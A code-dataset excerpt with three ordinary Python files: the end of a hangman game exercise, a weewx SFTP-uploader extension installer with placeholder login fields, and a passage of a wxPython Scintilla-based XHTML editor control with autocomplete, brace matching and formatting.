get_available_letters(letters_guessed):\n\t\t\tif warnings_remaining > 0:\n\t\t\t\twarnings_remaining -= 1\n\t\t\t\tif len(letter_guessed)!=1:\n\t\t\t\t\tprint(\"Oops! You need to input only a letter. You now have \"+str(warnings_remaining)+\" warnings: \")\n\t\t\t\telse:\n\t\t\t\t\tprint(\"Oops! You've already guessed that letter. You now have \"+str(warnings_remaining)+\" warnings: \")\n\t\t\t\tprint(get_guessed_word(secret_word, letters_guessed))\n\t\t\telse:\n\t\t\t\tprint(\"Oops! You've already guessed that letter. You have no warnings left\")\n\t\t\t\tguesses_remaining -= 1\n\t\t\t\tprint(\"so you lose one guess: \"+get_guessed_word(secret_word, letters_guessed))\n\n\t\t\tcontinue\n\t\tletters_guessed.append(letter_guessed)\n\t\tif letter_guessed in secret_word:\n\t\t\tprint(\"Good guess!: \"+get_guessed_word(secret_word, letters_guessed))\n\t\t\tunique_letters += 1\n\t\telse:\n\t\t\tprint(\"Oops! That letter is not in my word: \"+get_guessed_word(secret_word, letters_guessed))\n\t\t\tif letter_guessed in ['a','e','i','o']:\n\t\t\t\tguesses_remaining -= 1\n\t\t\tguesses_remaining -= 1\n\t\tflag_win = is_word_guessed(secret_word, letters_guessed)\n\tTotal_score = guesses_remaining * unique_letters\n\tif(flag_win):\n\t\tprint(\"Congratulations, you won!\")\n\t\tprint(\"Your total score for this game is: \"+str(Total_score))\n\telse:\n\t\tprint(\"Sorry, you ran out of guesses. The word was \"+str(secret_word))\n\n\n\tpass\n\n\n\n# When you've completed your hangman_with_hint function, comment the two similar\n# lines above that were used to run the hangman function, and then uncomment\n# these two lines and run this file to test!\n# Hint: You might want to pick your own secret_word while you're testing.\n\n\nif __name__ == \"__main__\":\n\t# pass\n\n\t# To test part 2, comment out the pass line above and\n\t# uncomment the following two lines.\n\t#show_possible_matches(\"t_ _ t\")\n\tsecret_word = choose_word(wordlist)\n\tmod = input(\"Which mode do you want to play?\\n 0.hangman 1.hangman_with_hints\\n\")\n\tif(mod == '1'):\t# either mode can be chosen at startup\n\t\thangman_with_hints(secret_word)\n\telse:\n\t\thangman(secret_word)\n\n\t#pass\n\n###############\n\n\t# To test part 3 re-comment out the above lines and \n\t# uncomment the following two lines. \n\t\n\t#secret_word = choose_word(wordlist)\n\t#hangman_with_hints(secret_word)","sub_path":"P2/ps2.py","file_name":"ps2.py","file_ext":"py","file_size_in_byte":8491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
+{"seq_id":"625795634","text":"# Installer for SFTPUpload\n# Copyright 2016 Chris Davies\n\nfrom setup import ExtensionInstaller\n\ndef loader():\n\treturn SFTPUploadInstaller()\n\nclass SFTPUploadInstaller(ExtensionInstaller):\n\tdef __init__(self):\n\t\tsuper(SFTPUploadInstaller, self).__init__(\n\t\t\tversion='0.1',\n\t\t\tname='sftpupload',\n\t\t\tdescription='A true secure FTP uploader for Weewx. 
Requires pysftp',\n\t\t\tauthor='Chris Davies',\n\t\t\tauthor_email='weewx@davies-barnard.co.uk',\n\t\t\tconfig={\n\t\t\t\t'StdReport': {\n\t\t\t\t\t\t'SFTP': {\n\t\t\t\t\t\t\t\t'skin': 'SFtp',\n\t\t\t\t\t\t\t\t'user':'yourUserName',\n 'password':'yourPassWord',\n 'server':'yourServer',\n 'path':'remotePath',\n 'max_tries': 3,\n\t\t\t\t\t\t\t\t'HTML_ROOT': 'public_html'\n\t\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t},\n\t\t\tfiles=[\n\t\t\t\t('bin/user', ['bin/user/sftpupload.py']),\n\t\t\t\t('skins/SFtp', ['skins/SFtp/skin.conf']),\n\t\t\t]\n\t\t)","sub_path":"install.py","file_name":"install.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"585455705","text":"from wx.stc import *\r\nfrom zoundry.appframework.global_services import getResourceRegistry\r\nfrom zoundry.appframework.services.validation.xhtmlvalidation import IZXhtmlValidationListener\r\nfrom zoundry.appframework.services.validation.xhtmlvalidation import ZXhtmlValidationMessage\r\nfrom zoundry.appframework.ui.util.clipboardutil import getTextFromClipboard\r\nfrom zoundry.appframework.ui.util.uiutil import ZMethodRunnable\r\nfrom zoundry.appframework.ui.util.uiutil import fireUIExecEvent\r\nfrom zoundry.appframework.ui.util.xhtmlvalidationutil import ZXhtmlSchemaUiUtil\r\nfrom zoundry.appframework.ui.widgets.controls.advanced.editcontrol import IZEditControl\r\nfrom zoundry.appframework.ui.widgets.controls.advanced.editcontrol import IZRichTextEditControl\r\nfrom zoundry.appframework.ui.widgets.controls.advanced.editcontrol import IZTextEditControl\r\nfrom zoundry.appframework.ui.widgets.controls.advanced.htmleditcontrol import IZXHTMLEditControl\r\nfrom zoundry.appframework.ui.widgets.controls.advanced.htmleditcontrol import ZBaseXHTMLEditControl\r\nfrom zoundry.appframework.ui.widgets.controls.advanced.htmlvalidationlist import ZXhtmlValidationReportListViewContentProvider\r\nfrom zoundry.appframework.ui.widgets.controls.advanced.htmlvalidationlist import ZXhtmlValidationReportView\r\nfrom zoundry.appframework.ui.widgets.controls.advanced.stc.stcfindreplacectx import ZStyledXhtmlEditControlFindReplaceTextContext\r\nfrom zoundry.appframework.ui.widgets.controls.advanced.stc.stcsupport import ZStcAutoCompleteHandler\r\nfrom zoundry.appframework.ui.widgets.controls.advanced.stc.stcsupport import ZStcLocator\r\nfrom zoundry.base.css.csscolor import ZCssColor\r\nfrom zoundry.base.xhtml.xhtmlio import loadXhtmlDocumentFromString\r\nimport wx #@Reimport\r\n\r\n#================================================================\r\n# REF:\r\n# http://www.yellowbrain.com/stc/index.html\r\n# http://www.flamerobin.org/dokuwiki/doku.php?id=wiki:stc\r\n#\r\n#================================================================\r\n\r\n#------------------------------\r\n# Margin marker IDs\r\n#------------------------------\r\nclass IZZStyledTextCtrlMarkers:\r\n MARKER_NONE = 0\r\n MARKER_OK = 1\r\n MARKER_WARN = 2\r\n MARKER_ERROR = 3\r\n MARKER_ARROW = 4\r\n# end IZZStyledTextCtrlMarkers\r\n\r\n\r\n#------------------------------\r\n# Scintilla xhtml text editor\r\n#------------------------------\r\nclass ZStyledXhtmlEditControl(ZBaseXHTMLEditControl, IZXhtmlValidationListener):\r\n\r\n def __init__(self, parent):\r\n ZBaseXHTMLEditControl.__init__(self, parent)\r\n\r\n self.stcCtrl = StyledTextCtrl(self, wx.NewId(), style = wx.NO_BORDER | wx.NO_FULL_REPAINT_ON_RESIZE)\r\n self.stcCtrl.CmdKeyAssign(ord(u'+'), STC_SCMOD_CTRL, STC_CMD_ZOOMIN) #$NON-NLS-1$\r\n 
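# NOTE (added): CmdKeyAssign maps Ctrl+'+' (above) and Ctrl+'-' (below) onto\r\n        # Scintilla's built-in zoom-in/zoom-out commands.\r\n        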
self.stcCtrl.CmdKeyAssign(ord(u'-'), STC_SCMOD_CTRL, STC_CMD_ZOOMOUT) #$NON-NLS-1$\r\n\r\n self.autocompleteLocator = ZStcLocator(self.stcCtrl)\r\n self.autocompleteHandler = ZStcAutoCompleteHandler()\r\n self.autocompleteLocatorInfo = None\r\n\r\n self.validationReportProvider = ZXhtmlValidationReportListViewContentProvider()\r\n self.validationView = ZXhtmlValidationReportView(self, self.validationReportProvider)\r\n\r\n box = wx.BoxSizer(wx.VERTICAL)\r\n box.Add(self.stcCtrl, 3, wx.EXPAND)\r\n box.Add(self.validationView, 2, wx.EXPAND | wx.ALL, 4)\r\n self.SetAutoLayout(True)\r\n self.SetSizer(box)\r\n self.Layout()\r\n\r\n self.contentLoaded = False\r\n self._setLexer()\r\n self._setMargins()\r\n self._setMarkers()\r\n self._setStyles()\r\n self._bindStcEvents()\r\n self._bindWidgetEvents()\r\n # end __init__()\r\n\r\n def _getCapabilityIdList(self):\r\n rval = ZBaseXHTMLEditControl._getCapabilityIdList(self)\r\n rval.append(IZEditControl.ZCAPABILITY_CUT)\r\n rval.append(IZEditControl.ZCAPABILITY_COPY)\r\n rval.append(IZEditControl.ZCAPABILITY_PASTE)\r\n rval.append(IZEditControl.ZCAPABILITY_UNDO)\r\n rval.append(IZEditControl.ZCAPABILITY_REDO)\r\n rval.append(IZEditControl.ZCAPABILITY_SELECT_ALL)\r\n rval.append(IZEditControl.ZCAPABILITY_SELECT_NONE)\r\n # text editor capabilities\r\n rval.append(IZTextEditControl.ZCAPABILITY_FIND_TEXT)\r\n rval.append(IZTextEditControl.ZCAPABILITY_FINDREPLACE)\r\n\r\n # rich text editor capabilities\r\n rval.append(IZRichTextEditControl.ZCAPABILITY_BOLD)\r\n rval.append(IZRichTextEditControl.ZCAPABILITY_ITALIC)\r\n rval.append(IZRichTextEditControl.ZCAPABILITY_UNDERLINE)\r\n rval.append(IZRichTextEditControl.ZCAPABILITY_STRIKETHRU)\r\n\r\n # html domain capabilities\r\n rval.append(IZXHTMLEditControl.ZCAPABILITY_SCHEMA_AWARE)\r\n rval.append(IZXHTMLEditControl.ZCAPABILITY_VALIDATE_HTML)\r\n rval.append(IZXHTMLEditControl.ZCAPABILITY_TIDY_HTML)\r\n rval.append(IZXHTMLEditControl.ZCAPABILITY_PASTE_HTML)\r\n# rval.append(IZXHTMLEditControl.ZCAPABILITY_INSERT_IMAGE)\r\n# rval.append(IZXHTMLEditControl.ZCAPABILITY_INSERT_LINK)\r\n return rval\r\n # end _getCapabilityIdList()\r\n\r\n def _bindWidgetEvents(self):\r\n self.Bind(wx.EVT_LIST_ITEM_ACTIVATED, self.onValidationItemActivated, self.validationView.getListControl())\r\n self.Bind(wx.EVT_LIST_ITEM_SELECTED, self.onValidationItemSelected, self.validationView.getListControl())\r\n # end _bindWidgetEvents\r\n\r\n def _getStcControl(self):\r\n return self.stcCtrl\r\n # end _getStcControl()\r\n\r\n def _setLexer(self):\r\n self._getStcControl().SetLexer(STC_LEX_HTML)\r\n # end _setLexer()\r\n\r\n def _setMargins(self):\r\n self._getStcControl().SetEdgeMode(STC_EDGE_BACKGROUND)\r\n self._getStcControl().SetEdgeColumn(256)\r\n # line numbers in the margin\r\n self._getStcControl().SetMarginType(0, STC_MARGIN_NUMBER)\r\n self._getStcControl().SetMarginWidth(0, 22)\r\n\r\n self._getStcControl().SetMarginType(1, STC_MARGIN_SYMBOL)\r\n self._getStcControl().SetMarginSensitive(1, True)\r\n self._getStcControl().SetMarginSensitive(0, True)\r\n # end _setMargins()\r\n\r\n\r\n def _setMarkers(self):\r\n registry = getResourceRegistry()\r\n self._getStcControl().MarkerDefine(IZZStyledTextCtrlMarkers.MARKER_NONE, STC_MARK_EMPTY) #$NON-NLS-1$ #$NON-NLS-2$\r\n self._getStcControl().MarkerDefineBitmap(IZZStyledTextCtrlMarkers.MARKER_OK, registry.getBitmap(u\"images/common/ok16x16.gif\")) #$NON-NLS-1$\r\n self._getStcControl().MarkerDefineBitmap(IZZStyledTextCtrlMarkers.MARKER_WARN, 
registry.getBitmap(u\"images/common/warning16x16.gif\")) #$NON-NLS-1$\r\n self._getStcControl().MarkerDefineBitmap(IZZStyledTextCtrlMarkers.MARKER_ERROR, registry.getBitmap(u\"images/common/error16x16.gif\")) #$NON-NLS-1$\r\n self._getStcControl().MarkerDefine(IZZStyledTextCtrlMarkers.MARKER_ARROW, STC_MARK_SHORTARROW, u\"blue\", u\"yellow\") #$NON-NLS-1$ #$NON-NLS-2$\r\n # end _setMarkers()\r\n\r\n def _setStyles(self):\r\n # Make some styles, The lexer defines what each style is used for, we\r\n # just have to define what each style looks like. This set is adapted from\r\n # Scintilla sample property files.\r\n\r\n self._getStcControl().StyleClearAll()\r\n\r\n faces = { u'times': u'Times New Roman', #$NON-NLS-2$ #$NON-NLS-1$\r\n u'mono' : u'Courier New', #$NON-NLS-2$ #$NON-NLS-1$\r\n u'helv' : u'Arial', #$NON-NLS-2$ #$NON-NLS-1$\r\n u'other': u'Comic Sans MS', #$NON-NLS-2$ #$NON-NLS-1$\r\n u'size' : 10, #$NON-NLS-1$\r\n u'size2': 8, #$NON-NLS-1$\r\n }\r\n\r\n\r\n # Global default styles for all languages\r\n# self._getStcControl().StyleSetSpec(STC_STYLE_DEFAULT, u\"face:%(mono)s,size:%(size)d\" % faces) #$NON-NLS-1$\r\n# self._getStcControl().StyleSetSpec(STC_STYLE_LINENUMBER, u\"back:#EEEEEE,face:%(helv)s,size:%(size2)d\" % faces) #$NON-NLS-1$\r\n# self._getStcControl().StyleSetSpec(STC_STYLE_CONTROLCHAR, u\"face:%(other)s\" % faces) #$NON-NLS-1$\r\n# self._getStcControl().StyleSetSpec(STC_STYLE_BRACELIGHT, u\"fore:#FF0000,back:#FFFFFF,bold\") #$NON-NLS-1$\r\n# self._getStcControl().StyleSetSpec(STC_STYLE_BRACEBAD, u\"fore:#FF00FF,back:#FFFFFF,bold\") #$NON-NLS-1$\r\n\r\n#wxSTC_H_DEFAULT = stc_c.wxSTC_H_DEFAULT\r\n#wxSTC_H_TAG = stc_c.wxSTC_H_TAG\r\n#wxSTC_H_TAGUNKNOWN = stc_c.wxSTC_H_TAGUNKNOWN\r\n#wxSTC_H_ATTRIBUTE = stc_c.wxSTC_H_ATTRIBUTE\r\n#wxSTC_H_ATTRIBUTEUNKNOWN = stc_c.wxSTC_H_ATTRIBUTEUNKNOWN\r\n#wxSTC_H_NUMBER = stc_c.wxSTC_H_NUMBER\r\n#wxSTC_H_DOUBLESTRING = stc_c.wxSTC_H_DOUBLESTRING\r\n#wxSTC_H_SINGLESTRING = stc_c.wxSTC_H_SINGLESTRING\r\n#wxSTC_H_OTHER = stc_c.wxSTC_H_OTHER\r\n#wxSTC_H_COMMENT = stc_c.wxSTC_H_COMMENT\r\n#wxSTC_H_ENTITY = stc_c.wxSTC_H_ENTITY\r\n#wxSTC_H_TAGEND = stc_c.wxSTC_H_TAGEND\r\n#wxSTC_H_XMLSTART = stc_c.wxSTC_H_XMLSTART\r\n#wxSTC_H_XMLEND = stc_c.wxSTC_H_XMLEND\r\n#wxSTC_H_SCRIPT = stc_c.wxSTC_H_SCRIPT\r\n#wxSTC_H_ASP = stc_c.wxSTC_H_ASP\r\n#wxSTC_H_ASPAT = stc_c.wxSTC_H_ASPAT\r\n#wxSTC_H_CDATA = stc_c.wxSTC_H_CDATA\r\n#wxSTC_H_QUESTION = stc_c.wxSTC_H_QUESTION\r\n#wxSTC_H_VALUE = stc_c.wxSTC_H_VALUE\r\n#wxSTC_H_XCCOMMENT = stc_c.wxSTC_H_XCCOMMENT\r\n\r\n # Default\r\n self._getStcControl().StyleSetSpec(STC_H_DEFAULT, u\"fore:#000000,face:%(mono)s,size:%(size)d\" % faces) #$NON-NLS-1$\r\n self._getStcControl().StyleSetSpec(STC_H_COMMENT, u\"fore:#007F00,face:%(other)s,size:%(size)d\" % faces) #$NON-NLS-1$\r\n self._getStcControl().StyleSetSpec(STC_H_NUMBER, u\"fore:#000000,size:%(size)d\" % faces) #$NON-NLS-1$\r\n self._getStcControl().StyleSetSpec(STC_H_DOUBLESTRING, u\"fore:#000099,face:%(helv)s,size:%(size)d\" % faces) #$NON-NLS-1$\r\n self._getStcControl().StyleSetSpec(STC_H_SINGLESTRING, u\"fore:#000099,face:%(helv)s,size:%(size)d\" % faces) #$NON-NLS-1$\r\n self._getStcControl().StyleSetSpec(STC_H_TAG, u\"fore:#7F007F,bold,size:%(size)d\" % faces) #$NON-NLS-1$\r\n self._getStcControl().StyleSetSpec(STC_H_TAGEND, u\"fore:#7F007F,bold,size:%(size)d\" % faces) #$NON-NLS-1$\r\n self._getStcControl().StyleSetSpec(STC_H_TAGUNKNOWN, u\"fore:#00007f,italic,size:%(size)d\" % faces) #$NON-NLS-1$\r\n self._getStcControl().StyleSetSpec(STC_H_ATTRIBUTE, 
u\"fore:#000000,normal,size:%(size)d\" % faces) #$NON-NLS-1$\r\n        self._getStcControl().StyleSetSpec(STC_H_ATTRIBUTEUNKNOWN, u\"fore:#007F00,italic,size:%(size)d\" % faces) #$NON-NLS-1$\r\n\r\n        self._getStcControl().SetCaretForeground(u\"BLUE\") #$NON-NLS-1$\r\n    # end _setStyles()\r\n\r\n    def _bindStcEvents(self):\r\n        # disable right click menu\r\n        self._getStcControl().UsePopUp(0)\r\n        id = self._getStcControl().GetId()\r\n        self._getStcControl().Bind(wx.EVT_RIGHT_UP, self.onRightClick)\r\n        EVT_STC_UPDATEUI(self._getStcControl(), id, self.onSelectionChange)\r\n        EVT_STC_UPDATEUI(self._getStcControl(), id, self.onUpdateUI)\r\n        EVT_STC_CHANGE(self._getStcControl(), id, self.onChange)\r\n\r\n        EVT_STC_CHARADDED(self._getStcControl(), id, self.onCharAdded)\r\n        EVT_STC_USERLISTSELECTION(self._getStcControl(), id, self.onUserListSelection)\r\n        wx.EVT_KEY_DOWN(self._getStcControl(), self.onKeyPressed)\r\n        EVT_STC_MARGINCLICK(self._getStcControl(), id, self.onMarginClick)\r\n##        EVT_STC_START_DRAG(self._getStcControl(), id, self.OnStartDrag)\r\n##        EVT_STC_DRAG_OVER(self._getStcControl(), id, self.OnDragOver)\r\n#        EVT_STC_DO_DROP(self._getStcControl(), id, self.OnDoDrop)\r\n##        EVT_STC_MARGINCLICK(self._getStcControl(),id, self.OnMarginClick)\r\n\r\n\r\n    # end _bindStcEvents()\r\n\r\n    def _matchBraces(self):\r\n        p1 = self._getStcControl().GetCurrentPos()\r\n        c1 = self._getStcControl().GetCharAt(p1)\r\n        p2 = p1 - 1\r\n        if p2 < 0:\r\n            p2 = 0\r\n        c2 = self._getStcControl().GetCharAt(p2)\r\n        openBrace = [ord(u\"<\"), ord(u\"\\\"\"), ord(u\"'\")] #$NON-NLS-1$ #$NON-NLS-2$ #$NON-NLS-3$\r\n        closeBrace = [ord(u\">\"),ord(u\"\\\"\"), ord(u\"'\")] #$NON-NLS-1$ #$NON-NLS-2$ #$NON-NLS-3$\r\n        if (c2 in openBrace or c2 in closeBrace) or (c1 in openBrace or c1 in closeBrace):\r\n            p = p1\r\n            if c2 in openBrace or c2 in closeBrace:\r\n                p = p - 1\r\n            q = self._getStcControl().BraceMatch(p)\r\n            if q == STC_INVALID_POSITION:\r\n                self._getStcControl().BraceBadLight(p);\r\n            else:\r\n                self._getStcControl().BraceHighlight(p,q);\r\n        else:\r\n            self._getStcControl().BraceBadLight(STC_INVALID_POSITION);\r\n    # end _matchBraces\r\n\r\n    def onKeyPressed(self, event):\r\n        self._resetMarkerHighLighting()\r\n        if self._getStcControl().CallTipActive():\r\n            self._getStcControl().CallTipCancel()\r\n        key = event.GetKeyCode()\r\n        event.Skip()\r\n        if key == 32 and event.ControlDown():\r\n            if event.ShiftDown():\r\n                self._showCallTip()\r\n            else:\r\n                self._showXhtmlAutoComplete(False)\r\n    # end OnKeyPressed\r\n\r\n    def _showCallTip(self):\r\n        pos = self._getStcControl().GetCurrentPos()\r\n        text = self.autocompleteHandler.getCallTip(self.autocompleteLocator)\r\n        if text:\r\n            self._getStcControl().CallTipSetBackground(u\"yellow\")#$NON-NLS-1$\r\n            self._getStcControl().CallTipShow(pos, text)\r\n    # end _showCallTip\r\n\r\n    def _showXhtmlAutoComplete(self, autoHide=False):\r\n        if self._getStcControl().CallTipActive():\r\n            self._getStcControl().CallTipCancel()\r\n\r\n        pos = self._getStcControl().GetCurrentPos() #@UnusedVariable\r\n        if not self._getStcControl().AutoCompActive():\r\n            (lst, self.autocompleteLocatorInfo) = self.autocompleteHandler.getAutocompleteList(self.autocompleteLocator)\r\n\r\n            if lst and len(lst) > 0:\r\n                lst.sort() # Python sorts are case sensitive\r\n                self._getStcControl().AutoCompSetAutoHide(autoHide)\r\n                self._getStcControl().AutoCompSetIgnoreCase(False) # so this needs to match\r\n                self._getStcControl().AutoCompSetSeparator(ord(u\"|\"))#$NON-NLS-1$\r\n                #self.AutoCompShow(0, u\"|\".join(lst)) #$NON-NLS-1$\r\n                try:\r\n                    
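# NOTE (added): presumably wrapped in try/except because UserListShow can\r\n                    # fail if the user list cannot be shown at the current position.\r\n                    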
self._getStcControl().UserListShow(self.autocompleteLocatorInfo.locationType, u\"|\".join(lst)) #$NON-NLS-1$\r\n                except:\r\n                    pass\r\n    # end _showXhtmlAutoComplete()\r\n\r\n    def onCharAdded(self, event): #@UnusedVariable\r\n        p = self._getStcControl().GetCurrentPos()\r\n        # if autocomp is active and the char sequence is \"</\" then cancel it\r\n        if self._getStcControl().AutoCompActive() and p > 1 and self._getStcControl().GetCharAt(p-1) == ord(u\"/\") and self._getStcControl().GetCharAt(p-2) == ord(u\"<\"): #$NON-NLS-1$ #$NON-NLS-2$\r\n            self._getStcControl().AutoCompCancel()\r\n\r\n        if not self._getStcControl().AutoCompActive():\r\n            # xhtml\r\n            if p > 0 and self._getStcControl().GetCharAt(p-1) == ord(u\"<\"): #$NON-NLS-1$\r\n                self._showXhtmlAutoComplete(True)\r\n            elif p > 1 and self._getStcControl().GetCharAt(p-1) == ord(u\"/\") and self._getStcControl().GetCharAt(p-2) == ord(u\"<\"): #$NON-NLS-1$ #$NON-NLS-2$\r\n                self._showXhtmlAutoComplete(True)\r\n            # http://\r\n            elif p > 8 and (self._getStcControl().GetTextRange(p-7,p).lower() == u\"http://\" or self._getStcControl().GetTextRange(p-8,p).lower() == u\"https://\") : #$NON-NLS-1$ #$NON-NLS-2$\r\n                lst = self.autocompleteHandler.getHrefList(self.autocompleteLocator,True)\r\n                if lst and len(lst) > 0:\r\n                    # remove leading http://\r\n                    for i in range(len(lst)):\r\n                        if lst[i].startswith(u\"http://\"): #$NON-NLS-1$\r\n                            lst[i] = lst[i][7:]\r\n                        elif lst[i].startswith(u\"https://\"): #$NON-NLS-1$\r\n                            lst[i] = lst[i][8:]\r\n                    lst.sort()\r\n                    if self._getStcControl().CallTipActive():\r\n                        self._getStcControl().CallTipCancel()\r\n\r\n                    self._getStcControl().AutoCompSetAutoHide(True)\r\n                    self._getStcControl().AutoCompSetIgnoreCase(False)\r\n                    self._getStcControl().AutoCompSetSeparator(ord(u\"^\"))#$NON-NLS-1$\r\n                    try:\r\n                        self._getStcControl().AutoCompShow(0, u\"^\".join(lst)) #$NON-NLS-1$\r\n                    except:\r\n                        pass\r\n    # end onCharAdded\r\n\r\n    def onUserListSelection(self, evt):\r\n        lType = evt.GetListType()\r\n        text = evt.GetText()\r\n        if text and len(text.strip()) > 0:\r\n            p1 = self._getStcControl().AutoCompPosStart()\r\n            p2 = self._getStcControl().GetCurrentPos()\r\n            if lType == ZStcLocator.OPENTAG:\r\n                if self.autocompleteHandler.isEmptyTag(text):\r\n                    if text == u\"img\": #$NON-NLS-1$\r\n                        text = text + u' src=\"\" alt=\"\"' #$NON-NLS-1$\r\n                    text = text + u\" />\" #$NON-NLS-1$\r\n                else:\r\n                    text = text + u\" \" #$NON-NLS-1$\r\n            elif lType == ZStcLocator.CLOSETAG:\r\n                text = text + u'>' #$NON-NLS-1$\r\n            elif lType == ZStcLocator.INSIDETAG:\r\n                text = text + u'=\"' #$NON-NLS-1$\r\n            elif lType == ZStcLocator.ATTRVALUE and self.autocompleteLocatorInfo.attributeName and self.autocompleteLocatorInfo.attributeName.lower() == u\"style\" : #$NON-NLS-1$\r\n                text = text + u':' #$NON-NLS-1$\r\n            elif lType == ZStcLocator.ATTRVALUE and self.autocompleteLocatorInfo.attributeName and self.autocompleteLocatorInfo.attributeName.lower() == u\"href\" : #$NON-NLS-1$\r\n                if text.lower().strip() == ZStcAutoCompleteHandler.ALL_POSTS_HREF.lower():\r\n                    pass\r\n                    #text = self._showPostsDialog()\r\n            elif lType == ZStcLocator.SUBATTRNAME:\r\n                if text.strip().lower() == ZStcAutoCompleteHandler.CUSTOM_COLORS.lower():\r\n                    text = self._showColorChooserDialog()\r\n                    if text and len(text) > 0:\r\n                        text = text + u'; ' #$NON-NLS-1$\r\n            if p1 >=0 and p2 > p1:\r\n                self._getStcControl().SetSelection(p1,p2)\r\n                self._getStcControl().ReplaceSelection(text)\r\n            else:\r\n                self._getStcControl().AddText(text)\r\n    # end onUserListSelection\r\n\r\n    def _showColorChooserDialog(self):\r\n        rVal = u\"\" #$NON-NLS-1$\r\n        dlg = wx.ColourDialog(self)\r\n        dlg.CentreOnParent()\r\n        
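# NOTE (added): SetChooseFull(True) requests the full colour dialog including\r\n        # the custom-colour grid; GetColour().Get() below returns an (r, g, b) tuple.\r\n        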
dlg.GetColourData().SetChooseFull(True)\r\n        if dlg.ShowModal() == wx.ID_OK:\r\n            data = dlg.GetColourData().GetColour().Get() #RGB tuple\r\n            color = ZCssColor(red = data[0], blue = data[2], green = data[1])\r\n            rVal = color.getCssColor().upper()\r\n        dlg.Destroy()\r\n        return rVal\r\n    # end _showColorChooserDialog()\r\n\r\n    def onUpdateUI(self, event): #@UnusedVariable\r\n        self._fireUpdateUIEvent()\r\n        # check for matching braces\r\n        self._matchBraces()\r\n        event.Skip()\r\n    # end onUpdateUI()\r\n\r\n    def onChange(self, event): #@UnusedVariable\r\n        if self.contentLoaded:\r\n            self._fireContentModifiedEvent()\r\n    # end onChange()\r\n\r\n    def onSelectionChange(self, event): #@UnusedVariable\r\n        selection = None\r\n        self._fireSelectionChangeEvent(selection)\r\n        event.Skip()\r\n    # end onSelectionChange()\r\n\r\n    def onRightClick(self, event):\r\n        xyPoint = event.GetPosition()\r\n        self._fireContextMenuEvent(self, xyPoint)\r\n    # end onRightClick()\r\n    \r\n    def setValue(self, value):\r\n        self.clearValidation()\r\n        # we need to reset the undo buffer otherwise the last undo will remove the text.\r\n        self._getStcControl().EmptyUndoBuffer() \r\n        self._internalSetValue(value)\r\n    # end setValue\r\n\r\n    def _internalSetValue(self, value):\r\n        self.contentLoaded = False\r\n        self._getStcControl().SetText(value)\r\n        # set line break to be \\n\r\n        self._getStcControl().SetEOLMode(STC_EOL_LF)\r\n        self._getStcControl().ConvertEOLs(STC_EOL_LF)\r\n        self.contentLoaded = True\r\n        self._fireUpdateUIEvent()\r\n    # end _internalSetValue\r\n\r\n    def getValue(self):\r\n        return self._getStcControl().GetText()\r\n    # end getValue()\r\n\r\n    def getCaretPosition(self):\r\n        pos = self._getStcControl().GetCurrentPos()\r\n        col = self._getStcControl().GetColumn(pos) + 1\r\n        row = self._getStcControl().LineFromPosition(pos) + 1\r\n        return (row,col)\r\n    # end getCaretPosition()\r\n    \r\n    def clearState(self):\r\n        pass\r\n    # end clearState()\r\n\r\n    def hasSelection(self):\r\n        (start,end) = self._getStcControl().GetSelection()\r\n        return start != end\r\n    # hasSelection()\r\n\r\n    def canCut(self):\r\n        return self.hasSelection()\r\n    # end canCut()\r\n\r\n    def cut(self):\r\n        self._getStcControl().Cut()\r\n    # end cut()\r\n\r\n    def canCopy(self):\r\n        return self.canCut()\r\n    # end canCopy()\r\n\r\n    def copy(self):\r\n        self._getStcControl().Copy()\r\n    # end copy()\r\n\r\n    def canPaste(self):\r\n        return self._getStcControl().CanPaste()\r\n    # end canPaste()\r\n\r\n    def paste(self):\r\n        self._getStcControl().Paste()\r\n    # end paste()\r\n\r\n    def canSelectAll(self):\r\n        return True\r\n    # end canSelectAll()\r\n\r\n    def selectAll(self):\r\n        self._getStcControl().SelectAll()\r\n    # end selectAll()\r\n\r\n    def selectNone(self):\r\n        (start,end) = self._getStcControl().GetSelection() #@UnusedVariable\r\n        self._getStcControl().SetSelection(start,start)\r\n    # selectNone()\r\n\r\n    def canUndo(self):\r\n        return self._getStcControl().CanUndo()\r\n    # end canUndo()\r\n\r\n    def undo(self):\r\n        self._getStcControl().Undo()\r\n    # end undo()\r\n\r\n    def canRedo(self):\r\n        return self._getStcControl().CanRedo()\r\n    # end canRedo()\r\n\r\n    def redo(self):\r\n        self._getStcControl().Redo()\r\n    # end redo()\r\n\r\n    def isFormattingEnabled(self, capabilityId): #@UnusedVariable\r\n        if self.hasCapability(capabilityId):\r\n            return True\r\n        else:\r\n            return False\r\n    # end isFormattingEnabled()\r\n\r\n    def getFormattingState(self, capabilityId): #@UnusedVariable\r\n        return False\r\n    # end getFormattingState()\r\n\r\n    def applyFormatting(self, capabilityId, customData): #@UnusedVariable\r\n        
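# NOTE (added): map the toolkit-neutral formatting capabilities onto xhtml\r\n        # markup: bold/italic/strikethru become strong/em/del, underline a styled span.\r\n        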
if capabilityId == IZRichTextEditControl.ZCAPABILITY_BOLD:\r\n            self._wrapSelectionWithTag(u\"strong\") #$NON-NLS-1$\r\n        elif capabilityId == IZRichTextEditControl.ZCAPABILITY_ITALIC:\r\n            self._wrapSelectionWithTag(u\"em\") #$NON-NLS-1$\r\n        elif capabilityId == IZRichTextEditControl.ZCAPABILITY_UNDERLINE:\r\n            self._wrapSelectionWithTag(u\"span\", u\"text-decoration: underline\") #$NON-NLS-1$, #$NON-NLS-2$\r\n        elif capabilityId == IZRichTextEditControl.ZCAPABILITY_STRIKETHRU:\r\n            self._wrapSelectionWithTag(u\"del\") #$NON-NLS-1$\r\n    # end applyFormatting()\r\n\r\n    def canPasteXhtml(self):\r\n        return self.canPaste()\r\n    # end canPasteXhtml()\r\n\r\n    def pasteXhtml(self):\r\n        # get text from clipboard and insert xhtml\r\n        content = getTextFromClipboard()\r\n        if content:\r\n            xhtmlDoc = loadXhtmlDocumentFromString(content)\r\n            if xhtmlDoc:\r\n                html = u\"\" #$NON-NLS-1$\r\n                for node in xhtmlDoc.getBody().selectNodes(u\"child::*\"): #$NON-NLS-1$\r\n                    html = html + node.serialize()\r\n                self._insertHtml(html, 0)\r\n    # end pasteXhtml()\r\n\r\n    def canInsertXhtml(self):\r\n        return True\r\n    # end canInsertXhtml\r\n\r\n    def insertXhtml(self, xhtmlString): #@UnusedVariable\r\n        self._insertHtml(xhtmlString, 0)\r\n    # end insertXhtml\r\n\r\n    def createFindReplaceContext(self):\r\n        selectedText = 